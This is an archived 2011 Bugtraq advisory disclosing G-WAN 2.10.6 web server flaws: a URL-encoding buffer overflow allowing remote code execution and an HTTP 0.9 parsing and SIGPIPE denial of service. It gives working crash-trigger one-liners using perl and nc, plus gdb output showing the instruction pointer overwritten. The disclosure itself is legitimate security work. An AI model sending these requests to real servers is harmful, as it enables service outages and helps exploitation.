lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <CAP7tO_6=umAR1eSMEgUyyykaCVO=1LJzobC6idLC-O8owfpVzg@mail.gmail.com>
Date: Thu, 13 Oct 2011 17:01:58 +0200
From: Fredrik Widlund <fredrik.widlund@...il.com>
To: bugtraq@...urityfocus.com
Cc: dm@...urityfocus.com
Subject: Multiple G-WAN vulnerabilities

========================================================================
Title: Multiple G-WAN vulnerabilities

Product: G-WAN (http://gwan.com/)

Author: Fredrik Widlund
E-mail: fredrik.widlund (at) gmail (dot) com

Date: 2011-10-12
========================================================================

1. BACKGROUND

"G-WAN is much smaller, faster and safer than the next best:
- Web servers,
- Web applications servers,
- Web acceleration servers,
- KV stores & noSQL databases." (from gwan.com)

2. DESCRIPTION

Problems exist with design issues, parsing, signal handling, and
buffer management.

A) A buffer overflow issue exists in the routine handling URL encoding
for the "csp" (so called G-WAN servlets) sub-directory. Exploiting the
vulnerability results in remotely being able to execute shellcode on
the system.

B) SIGPIPE signals were not handled correctly. Exploiting the
vulnerability resulted in denial of service.

C) Several minor issues.

3. DETAILS

The vulnerabilities were discovered and successfully exploited on an
Arch Linux 64-bit system running a Linux 3.0.6 kernel with ASLR
enabled.

A)
> perl -e "print 'GET /csp/','A'x1200,\" HTTP/1.0\r\n\r\n\"" | nc localhost 80
[...]
G-WAN 2.10.6 (pid:9167)
[New LWP 9169]
Program received signal SIGSEGV, Segmentation fault.
[Switching to LWP 9169]
0x41414141 in ?? ()
(gdb) i r
eax            0x31     49
ecx            0x81f2298        136258200
edx            0x0      0
ebx            0x41414141       1094795585
esp            0xf7da51f0       0xf7da51f0
ebp            0x41414141       0x41414141
esi            0x41414141       1094795585
edi            0x41414141       1094795585
eip            0x41414141       0x41414141
eflags         0x10202  [ IF RF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99

A proof of concept exploit was created brute forcing the ASLR stack
offset which leads to a vulnerable system being compromised remotely
in less than 5 minutes, sending a request each second at the most to
avoid the G-WAN watchdog giving up.

B)
The routines for parsing HTTP 0.9 were broken resulting in a
infinitely looping reply. Repeatedly interrupting such loops will
quickly result in denial of service.

> while :; do echo -e "GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n\r\n" | timeout 0.01 nc localhost 80 ; done
[...]
G-WAN 2.10.6 (pid:3948)
[New LWP 3951]
Program received signal SIGPIPE, Broken pipe.
[Switching to LWP 3951]
0xf7ffd430 in __kernel_vsyscall ()

4. AFFECTED VERSIONS

G-WAN 2.10.6 (October 6, 2011).

There is no archive of older versions available and the vendor refuses
to cooperate or acknowledge the issues.

5. SOLUTIONS

The issues seems to be resolved. Upgrade to the latest version.

6. REFERENCES

* http://gwan.com
* http://lonewolfer.wordpress.com/2011/10/10/intermezzo-about-stability-and-compliance/
* http://lonewolfer.wordpress.com/2011/10/10/intermezzo-about-stability-and-compliance-part-2/

========================================================================
Fredrik Widlund
fredrik.widlund (at) gmail (dot) com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ